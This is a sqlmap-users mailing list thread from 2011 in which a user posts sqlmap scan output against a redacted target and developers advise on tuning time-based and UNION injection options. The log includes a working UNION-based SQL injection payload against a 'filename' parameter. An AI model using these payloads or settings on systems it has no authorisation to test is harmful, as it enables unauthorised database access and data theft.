hi all. little tutorial for all of you. spot the problematic parts:
A) [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minut es and rerun without flag T in --technique option (e.g. --flush-session --techni que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) B) .... [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request .... C) do you want to exploit this SQL injection? [Y/n] Y [14:40:13] [INFO] testing MySQL [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form now. do you see the problem yourself? that warning message says it all. have you tried lowering the --time-sec value? have you tried running with --technique=BEUS? thing is that in INNER JOIN cases injecting TIME BASED payloads can do lots of "[CRITICAL]" messages. hence that nice warning message :) kr On Tue, Jul 12, 2011 at 10:49 PM, Bernardo Damele A. G. <bernardo.dam...@gmail.com> wrote: > Hi Joahnna, > > Try to provide --union-char and --union-cols after you have verified > the UNION query SQL injection manually in your browser. > Rerun with --flush-session and -t traffic.log and inspect the log file > afterwards to see if the SQL payload is indeed part of the HTTP > response you expect it. > If the fingerprint keeps failing, provide sqlmap with --dbms "mysql 5". > > Bernardo > > > On 12 July 2011 14:32, Joahnna Marie Damiao <damijo_1...@yahoo.com> wrote: >> >> Hi, >> Below is the sqlmap command. Next time I ran it, it already says that the >> parameter filename is not injectable. However, I always get an info that the >> target URL is UNION injectable but the number of columns change every >> session. I also used the --technique=U --dbms=mysql --flush-session >> --level=3 --risk=3 and even the --time-sec=2 but I only get UNION injectable >> message but nothing is vulnerable. What seems to be the problem here? >> Anybody can help me? >> >> C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --b >> >> atch --beep >> >> >> >> sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover >> tool >> >> http://www.sqlmap.org >> >> >> >> [!] legal disclaimer: usage of sqlmap for attacking targets without prior >> mutual >> >> consent is illegal. It is the end user's responsibility to obey all >> applicable >> >> local, state and federal laws. Authors assume no liability and are not >> responsib >> >> le for any misuse or damage caused by this program >> >> >> >> [*] starting at 14:39:37 >> >> >> >> [14:39:37] [INFO] setting file for logging HTTP traffic >> >> [14:39:37] [INFO] testing connection to the target url >> >> [14:39:38] [INFO] searching for forms >> >> [#1] form: [INFO] >> >> GET xxxxxxxxx >> >> do you want to test this form? [Y/n/q] >> >> > Y >> >> Edit GET data [default: xxxxxxxx >> >> do you want to fill blank fields with random values? [Y/n] Y >> >> [14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as sessi >> >> on file >> >> [14:39:38] [INFO] using >> 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >> >> as results file >> >> [14:39:38] [INFO] testing if the url is stable, wait a few seconds >> >> [14:39:39] [INFO] url is stable >> >> [14:39:39] [INFO] testing if GET parameter 'productid' is dynamic >> >> [14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic >> >> [14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' >> might n >> >> ot be injectable >> >> [14:39:39] [INFO] testing sql injection on GET parameter 'productid' >> >> [14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >> >> [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING >> clause >> >> ' >> >> [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING >> clause' >> >> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE o >> >> r HAVING clause' >> >> [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause >> (XMLT >> >> ype)' >> >> [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> >> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> >> [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> >> [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> >> [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> >> [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> >> [14:39:41] [INFO] testing 'Oracle AND time-based blind' >> >> [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> >> [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> >> [14:39:42] [WARNING] using unescaped version of the test because of zero >> knowled >> >> ge of the back-end DBMS. you can try to explicitly set it using the --dbms >> optio >> >> n >> >> [14:39:44] [WARNING] GET parameter 'productid' is not injectable >> >> [14:39:44] [INFO] testing if GET parameter 'name' is dynamic >> >> [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic >> >> [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might >> not be >> >> injectable >> >> [14:39:44] [INFO] testing sql injection on GET parameter 'name' >> >> [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >> >> [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING >> clause >> >> ' >> >> [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING >> clause' >> >> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE o >> >> r HAVING clause' >> >> [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause >> (XMLT >> >> ype)' >> >> [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> >> [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> >> [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> >> [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> >> [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> >> [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> >> [14:39:46] [INFO] testing 'Oracle AND time-based blind' >> >> [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> >> [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> >> [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:39:51] [WARNING] GET parameter 'name' is not injectable >> >> [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic >> >> [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic >> >> [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' >> might no >> >> t be injectable >> >> [14:39:52] [INFO] testing sql injection on GET parameter 'filename' >> >> [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' >> >> [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING >> clause >> >> ' >> >> [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING >> clause' >> >> [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - >> WHERE o >> >> r HAVING clause' >> >> [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause >> (XMLT >> >> ype)' >> >> [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> >> [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' >> >> [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' >> >> [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:39:55] [WARNING] most probably web server instance hasn't recovered yet >> from >> >> previous timed based payload. if the problem persists please wait for few >> minut >> >> es and rerun without flag T in --technique option (e.g. --flush-session >> --techni >> >> que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) >> >> [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> >> [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' >> >> [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' >> >> [14:39:56] [INFO] testing 'Oracle AND time-based blind' >> >> [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> >> [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' >> >> [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:09] [CRITICAL] unable to connect to the target url or proxy >> >> [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns >> >> [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:13] [CRITICAL] unable to connect to the target url or proxy >> >> [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - >> 1 to >> >> 10 columns' injectable >> >> GET parameter 'filename' is vulnerable. Do you want to keep testing the >> others? >> >> [y/N] N >> >> sqlmap identified the following injection points with a total of 414 HTTP(s) >> req >> >> uests: >> >> --- >> >> Place: GET >> >> Parameter: filename >> >> Type: UNION query >> >> Title: Generic UNION query (NULL) - 1 to 10 columns >> >> Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, >> 'xsD >> >> iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND >> 'Aege'='Aege&cre >> >> ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti >> >> ve=on&comment=uPni >> >> --- >> >> >> >> do you want to exploit this SQL injection? [Y/n] Y >> >> [14:40:13] [INFO] testing MySQL >> >> [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap >> is go >> >> ing to retry the request >> >> [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to >> the >> >> next form >> >> [14:40:16] [INFO] you can find results of scanning in multiple targets mode >> insi >> >> de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' >> >> >> >> [*] shutting down at 14:40:16 >> >> ------------------------------------------------------------------------------ >> All of the data generated in your IT infrastructure is seriously valuable. >> Why? It contains a definitive record of application performance, security >> threats, fraudulent activity, and more. Splunk takes this data and makes >> sense of it. IT sense. And common sense. >> http://p.sf.net/sfu/splunk-d2d-c2 >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > > ------------------------------------------------------------------------------ > AppSumo Presents a FREE Video for the SourceForge Community by Eric > Ries, the creator of the Lean Startup Methodology on "Lean Startup > Secrets Revealed." This video shows you how to validate your ideas, > optimize your ideas and identify your business strategy. > http://p.sf.net/sfu/appsumosfdev2dev > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B ------------------------------------------------------------------------------ AppSumo Presents a FREE Video for the SourceForge Community by Eric Ries, the creator of the Lean Startup Methodology on "Lean Startup Secrets Revealed." This video shows you how to validate your ideas, optimize your ideas and identify your business strategy. http://p.sf.net/sfu/appsumosfdev2dev _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
